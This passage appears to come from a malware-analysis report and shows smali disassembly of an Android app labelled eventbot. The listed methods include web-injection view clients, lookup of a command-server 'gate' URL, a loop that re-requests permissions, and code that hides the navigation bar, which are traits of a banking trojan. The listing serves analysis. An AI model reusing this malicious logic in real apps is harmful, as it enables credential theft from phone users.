                        52iget-object v0, v0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        54invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        55goto/16 :goto_1f
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.Object.getClass
                        • java.lang.Class.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • cannot be VersionedParcelled
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(TT;)I"
                        5}
                        6.end annotation
                        7instance-of v0, p1, Ljava/lang/String;
                        8if-eqz v0, :cond_6
                        9const/4 p1, 0x4
                        10return p1
                        11cond_6: instance-of v0, p1, Landroid/os/Parcelable;
                        12if-eqz v0, :cond_c
                        13const/4 p1, 0x2
                        14return p1
                        15cond_c: instance-of v0, p1, Landroidx/versionedparcelable/VersionedParcelable;
                        16if-eqz v0, :cond_12
                        17const/4 p1, 0x1
                        18return p1
                        19cond_12: instance-of v0, p1, Ljava/io/Serializable;
                        20if-eqz v0, :cond_18
                        21const/4 p1, 0x3
                        22return p1
                        23cond_18: instance-of v0, p1, Landroid/os/IBinder;
                        24if-eqz v0, :cond_1e
                        25const/4 p1, 0x5
                        26return p1
                        27cond_1e: new-instance v0, Ljava/lang/IllegalArgumentException;
                        28new-instance v1, Ljava/lang/StringBuilder;
                        30invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        32invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        33move-result-object p1
                        35invoke-virtual {p1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        36move-result-object p1
                        38invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        40const-string p1, " cannot be VersionedParcelled"
                        42invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        44invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        45move-result-object p1
                        47invoke-direct {v0, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        48throw v0
                        APIs
                        • android.view.ViewConfiguration.get
                        • android.view.ViewConfiguration.hasPermanentMenuKey
                        • android.view.KeyCharacterMap.deviceHasKey
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [hideNavBar] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-static {p1}, Landroid/view/ViewConfiguration;->get(Landroid/content/Context;)Landroid/view/ViewConfiguration;
                        3move-result-object v0
                        5invoke-virtual {v0}, Landroid/view/ViewConfiguration;->hasPermanentMenuKey()Z
                        6move-result v0
                        7if-nez v0, :cond_2e
                        8const/4 v0, 0x4
                        10invoke-static {v0}, Landroid/view/KeyCharacterMap;->deviceHasKey(I)Z
                        11move-result v0
                        12if-nez v0, :cond_2e
                        13const/4 v0, 0x0
                        15invoke-static {p1, v0}, Lcom/lib;->hideArea(Landroid/content/Context;Z)Landroid/widget/FrameLayout;
                        16try_end_15: move-result-object v0
                        17goto_16: return-object v0
                        18catch_17: move-exception v0
                        19new-instance v1, Ljava/lang/StringBuilder;
                        21invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        23const-string v2, "[func] [hideNavBar] T: "
                        25invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v1
                        28invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        29move-result-object v0
                        31invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        32move-result-object v0
                        34invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        35cond_2e: const/4 v0, 0x0
                        36goto/16 :goto_16
                        Cross References
                        APIs
                        • org.json.JSONArray.length
                        • org.json.JSONArray.length
                        • org.json.JSONArray.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [bot] [func] [jsonArrayToStringArray] T:
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p1}, Lorg/json/JSONArray;->length()I
                        3move-result v0
                        4new-array v2, v0, [Ljava/lang/String;
                        5const/4 v0, 0x0
                        7invoke-virtual {p1}, Lorg/json/JSONArray;->length()I
                        8move-result v3
                        9move v1, v0
                        10goto_c: if-ge v1, v3, :cond_30
                        11try_start_e:
                        12invoke-virtual {p1, v1}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
                        13move-result-object v0
                        14aput-object v0, v2, v1
                        15try_end_14: add-int/lit8 v0, v1, 0x1
                        16move v1, v0
                        17goto/16 :goto_c
                        18catch_18: move-exception v0
                        19new-instance v4, Ljava/lang/StringBuilder;
                        21invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        23const-string v5, "[bot] [func] [jsonArrayToStringArray] T: "
                        25invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v4
                        28invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        29move-result-object v0
                        31invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        32move-result-object v0
                        34invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        35goto/16 :goto_14
                        36cond_30: return-object v2
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • gateUrlsPrefs
                        • /
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1: new-instance v1, Ljava/lang/StringBuilder;
                        4invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        6iget-object v2, p0, Lcom/lib;->context:Landroid/content/Context;
                        8const-string v3, "gateUrlsPrefs"
                        9const/4 v4, 0x0
                        11invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        12move-result-object v4
                        13const/4 v5, 0x0
                        15invoke-virtual {p0, v2, v3, v4, v5}, Lcom/lib;->getGateUrl(Landroid/content/Context;Ljava/lang/String;Ljava/lang/Integer;Z)Ljava/lang/String;
                        16move-result-object v2
                        18invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19move-result-object v1
                        21const-string v2, "/"
                        23invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        24move-result-object v1
                        26invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27move-result-object v1
                        29invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        30try_end_25: move-result-object v0
                        31goto_26: return-object v0
                        32catch_27: move-exception v1
                        33goto/16 :goto_26
                        APIs
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.lib$webInjViewClient.needStop
                        • com.lib$webInjViewClient.stop
                        • android.webkit.WebViewClient.onPageFinished
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] url:
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v2, "[func] [activity] [webViewClient] [onPageFinished] url: "
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v1
                        12invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v1
                        15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        16move-result-object v1
                        18invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        20invoke-virtual {p0, p2}, Lcom/lib$webInjViewClient;->needStop(Ljava/lang/String;)Z
                        21move-result v0
                        22if-eqz v0, :cond_21
                        24invoke-virtual {p0}, Lcom/lib$webInjViewClient;->stop()V
                        25cond_21:
                        26invoke-super {p0, p1, p2}, Landroid/webkit/WebViewClient;->onPageFinished(Landroid/webkit/WebView;Ljava/lang/String;)V
                        27return-void
                        APIs
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.lib$webInjViewClientOld.needStop
                        • com.lib$webInjViewClientOld.stop
                        • android.webkit.WebViewClient.onPageFinished
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] url:
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v2, "[func] [activity] [webViewClient] [onPageFinished] url: "
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v1
                        12invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v1
                        15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        16move-result-object v1
                        18invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        20invoke-virtual {p0, p2}, Lcom/lib$webInjViewClientOld;->needStop(Ljava/lang/String;)Z
                        21move-result v0
                        22if-eqz v0, :cond_21
                        24invoke-virtual {p0}, Lcom/lib$webInjViewClientOld;->stop()V
                        25cond_21:
                        26invoke-super {p0, p1, p2}, Landroid/webkit/WebViewClient;->onPageFinished(Landroid/webkit/WebView;Ljava/lang/String;)V
                        27return-void
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.putBoolean
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v2
                        13if-eqz p4, :cond_14
                        15invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        16cond_14: array-length v3, p3
                        17move v1, v0
                        18goto_16: if-ge v1, v3, :cond_21
                        19aget-object v4, p3, v1
                        20const/4 v5, 0x1
                        22invoke-interface {v2, v4, v5}, Landroid/content/SharedPreferences$Editor;->putBoolean(Ljava/lang/String;Z)Landroid/content/SharedPreferences$Editor;
                        23add-int/lit8 v1, v1, 0x1
                        24goto/16 :goto_16
                        25cond_21:
                        26invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        27try_end_24: move-result v0
                        28try_start_25:
                        29sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        31invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        32goto_2a: return v0
                        33catch_2b: move-exception v1
                        35sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        37invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        38goto/16 :goto_2a
                        39catch_32: move-exception v1
                        40goto/16 :goto_2a
                        41catchall_34: move-exception v1
                        43sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        45invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        46throw v1
                        Cross References
                        APIs
                        • android.os.Bundle.keySet
                        • java.util.Set.size
                        • java.io.DataOutputStream.writeInt
                        • java.util.Set.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • android.os.Bundle.get
                        • java.io.DataOutputStream.writeInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_2a
                        1try_start_2:
                        2invoke-virtual {p1}, Landroid/os/Bundle;->keySet()Ljava/util/Set;
                        3move-result-object v0
                        5iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        7invoke-interface {v0}, Ljava/util/Set;->size()I
                        8move-result v2
                        10invoke-virtual {v1, v2}, Ljava/io/DataOutputStream;->writeInt(I)V
                        12invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
                        13move-result-object v0
                        14goto_13:
                        15invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        16move-result v1
                        17if-eqz v1, :cond_30
                        19invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        20move-result-object v1
                        21check-cast v1, Ljava/lang/String;
                        23invoke-virtual {p0, v1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeString(Ljava/lang/String;)V
                        25invoke-virtual {p1, v1}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
                        26move-result-object v1
                        28invoke-direct {p0, v1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeObject(Ljava/lang/Object;)V
                        29goto/16 :goto_13
                        30cond_2a:
                        31iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        32const/4 v0, -0x1
                        34invoke-virtual {p1, v0}, Ljava/io/DataOutputStream;->writeInt(I)V
                        35cond_30: return-void
                        36catch_31: move-exception p1
                        37new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        39invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        40throw v0
                        Cross References
                        APIs
                        • java.lang.Class.getPackage
                        • java.lang.Package.getName
                        • java.lang.Class.getSimpleName
                        • java.lang.String.format
                        • java.lang.Class.getClassLoader
                        • java.lang.Class.forName
                        Strings
                        • %s.%sParcelizer
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/Class<",
                        4"+",
                        5"Landroidx/versionedparcelable/VersionedParcelable;",
                        6">;)",
                        7"Ljava/lang/Class;"
                        8}
                        9.end annotation
                        10.annotation system Ldalvik/annotation/Throws;
                        11value = {
                        12Ljava/lang/ClassNotFoundException;
                        13}
                        14.end annotation
                        16invoke-virtual {p0}, Ljava/lang/Class;->getPackage()Ljava/lang/Package;
                        17move-result-object v0
                        19invoke-virtual {v0}, Ljava/lang/Package;->getName()Ljava/lang/String;
                        20move-result-object v0
                        21const/4 v1, 0x2
                        22new-array v1, v1, [Ljava/lang/Object;
                        23const/4 v2, 0x0
                        24aput-object v0, v1, v2
                        26invoke-virtual {p0}, Ljava/lang/Class;->getSimpleName()Ljava/lang/String;
                        27move-result-object v0
                        28const/4 v3, 0x1
                        29aput-object v0, v1, v3
                        31const-string v0, "%s.%sParcelizer"
                        33invoke-static {v0, v1}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
                        34move-result-object v0
                        36invoke-virtual {p0}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        37move-result-object p0
                        39invoke-static {v0, v2, p0}, Ljava/lang/Class;->forName(Ljava/lang/String;ZLjava/lang/ClassLoader;)Ljava/lang/Class;
                        40move-result-object p0
                        41return-object p0
                        APIs
                        • android.os.Looper.prepare
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Thread.start
                        Strings
                        • [func] [permissionsThread] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-static {}, Landroid/os/Looper;->prepare()V
                        4iget-object v0, p0, Lcom/lib$2;->this$0:Lcom/lib;
                        6iget-object v1, p0, Lcom/lib$2;->this$0:Lcom/lib;
                        8iget-object v1, v1, Lcom/lib;->context:Landroid/content/Context;
                        9const/4 v2, 0x1
                        11invoke-virtual {v0, v1, v2}, Lcom/lib;->requestPermissions(Landroid/content/Context;Z)V
                        12goto_d: return-void
                        13catch_e: move-exception v0
                        15iget-object v1, p0, Lcom/lib$2;->this$0:Lcom/lib;
                        16new-instance v2, Ljava/lang/StringBuilder;
                        18invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        20const-string v3, "[func] [permissionsThread] T: "
                        22invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23move-result-object v2
                        25invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        26move-result-object v0
                        28invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        29move-result-object v0
                        31invoke-virtual {v1, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        32sget-boolean v0, Lcom/lib;->isLibUpdating:Z
                        33if-nez v0, :cond_d
                        35iget-object v0, p0, Lcom/lib$2;->this$0:Lcom/lib;
                        37iget-object v0, v0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        39invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        40goto/16 :goto_d
                        APIs
                        • android.support.v7.app.AppCompatActivity.onCreate
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • com.example.eventbot.activity.getIntent
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0const/4 p1, 0x0
                        2invoke-super {p0, p1}, Landroid/support/v7/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V
                        3try_start_4:
                        4sget-object p1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        5if-eqz p1, :cond_2c
                        7sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        8const p1, 0x7f09001c
                        10invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        11move-result-object v3
                        12const p1, 0x7f07007f
                        14invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        15move-result-object v4
                        17invoke-virtual {p0}, Lcom/example/eventbot/activity;->getIntent()Landroid/content/Intent;
                        18move-result-object p1
                        20const-string v1, "mode"
                        21const/4 v2, 0x0
                        23invoke-virtual {p1, v1, v2}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        24move-result p1
                        26invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        27move-result-object v5
                        28move-object v1, p0
                        29move-object v2, p0
                        31invoke-interface/range {v0 .. v5}, Lcom/libInterface;->doActivity(Landroid/content/Context;Landroid/app/Activity;Ljava/lang/Integer;Ljava/lang/Integer;Ljava/lang/Integer;)V
                        32try_end_2c: return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onBackPressed
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • com.example.eventbot.activity.getIntent
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        Strings
                        • mode
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/support/v7/app/AppCompatActivity;->onBackPressed()V
                        2try_start_3:
                        3sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        4if-eqz v0, :cond_2b
                        6sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        7const v0, 0x7f09001c
                        9invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v4
                        11const v0, 0x7f07007f
                        13invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        14move-result-object v5
                        16invoke-virtual {p0}, Lcom/example/eventbot/activity;->getIntent()Landroid/content/Intent;
                        17move-result-object v0
                        19const-string v2, "mode"
                        20const/4 v3, 0x0
                        22invoke-virtual {v0, v2, v3}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        23move-result v0
                        25invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        26move-result-object v6
                        27move-object v2, p0
                        28move-object v3, p0
                        30invoke-interface/range {v1 .. v6}, Lcom/libInterface;->onBackPressed(Landroid/content/Context;Landroid/app/Activity;Ljava/lang/Integer;Ljava/lang/Integer;Ljava/lang/Integer;)V
                        31try_end_2b: return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onDestroy
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • com.example.eventbot.activity.getIntent
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        Strings
                        • mode
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/support/v7/app/AppCompatActivity;->onDestroy()V
                        2try_start_3:
                        3sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        4if-eqz v0, :cond_2b
                        6sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        7const v0, 0x7f09001c
                        9invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v4
                        11const v0, 0x7f07007f
                        13invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        14move-result-object v5
                        16invoke-virtual {p0}, Lcom/example/eventbot/activity;->getIntent()Landroid/content/Intent;
                        17move-result-object v0
                        19const-string v2, "mode"
                        20const/4 v3, 0x0
                        22invoke-virtual {v0, v2, v3}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        23move-result v0
                        25invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        26move-result-object v6
                        27move-object v2, p0
                        28move-object v3, p0
                        30invoke-interface/range {v1 .. v6}, Lcom/libInterface;->onDestroy(Landroid/content/Context;Landroid/app/Activity;Ljava/lang/Integer;Ljava/lang/Integer;Ljava/lang/Integer;)V
                        31try_end_2b: return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onPause
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • com.example.eventbot.activity.getIntent
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        Strings
                        • mode
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/support/v7/app/AppCompatActivity;->onPause()V
                        2try_start_3:
                        3sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        4if-eqz v0, :cond_2b
                        6sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        7const v0, 0x7f09001c
                        9invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v4
                        11const v0, 0x7f07007f
                        13invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        14move-result-object v5
                        16invoke-virtual {p0}, Lcom/example/eventbot/activity;->getIntent()Landroid/content/Intent;
                        17move-result-object v0
                        19const-string v2, "mode"
                        20const/4 v3, 0x0
                        22invoke-virtual {v0, v2, v3}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        23move-result v0
                        25invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        26move-result-object v6
                        27move-object v2, p0
                        28move-object v3, p0
                        30invoke-interface/range {v1 .. v6}, Lcom/libInterface;->onPause(Landroid/content/Context;Landroid/app/Activity;Ljava/lang/Integer;Ljava/lang/Integer;Ljava/lang/Integer;)V
                        31try_end_2b: return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onStop
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • com.example.eventbot.activity.getIntent
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        Strings
                        • mode
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/support/v7/app/AppCompatActivity;->onStop()V
                        2try_start_3:
                        3sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        4if-eqz v0, :cond_2b
                        6sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        7const v0, 0x7f09001c
                        9invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v4
                        11const v0, 0x7f07007f
                        13invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        14move-result-object v5
                        16invoke-virtual {p0}, Lcom/example/eventbot/activity;->getIntent()Landroid/content/Intent;
                        17move-result-object v0
                        19const-string v2, "mode"
                        20const/4 v3, 0x0
                        22invoke-virtual {v0, v2, v3}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        23move-result v0
                        25invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        26move-result-object v6
                        27move-object v2, p0
                        28move-object v3, p0
                        30invoke-interface/range {v1 .. v6}, Lcom/libInterface;->onStop(Landroid/content/Context;Landroid/app/Activity;Ljava/lang/Integer;Ljava/lang/Integer;Ljava/lang/Integer;)V
                        31try_end_2b: return-void
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • android.app.Activity.finish
                        Strings
                        • [func] [activity] [onBackPressed]
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "[func] [activity] [onBackPressed] "
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10invoke-virtual {v0, p5}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        11move-result-object v0
                        13invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        14move-result-object v0
                        16invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        18invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        19move-result v0
                        20const/4 v1, 0x6
                        21if-ne v0, v1, :cond_26
                        22const/4 v0, 0x0
                        23iput-object v0, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        25invoke-virtual {p0, p1}, Lcom/lib;->minimizeAll(Landroid/content/Context;)V
                        27invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        28cond_26: return-void
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • android.app.Activity.finish
                        Strings
                        • [func] [activity] [onDestroy]
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "[func] [activity] [onDestroy] "
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10invoke-virtual {v0, p5}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        11move-result-object v0
                        13invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        14move-result-object v0
                        16invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        18invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        19move-result v0
                        20const/4 v1, 0x6
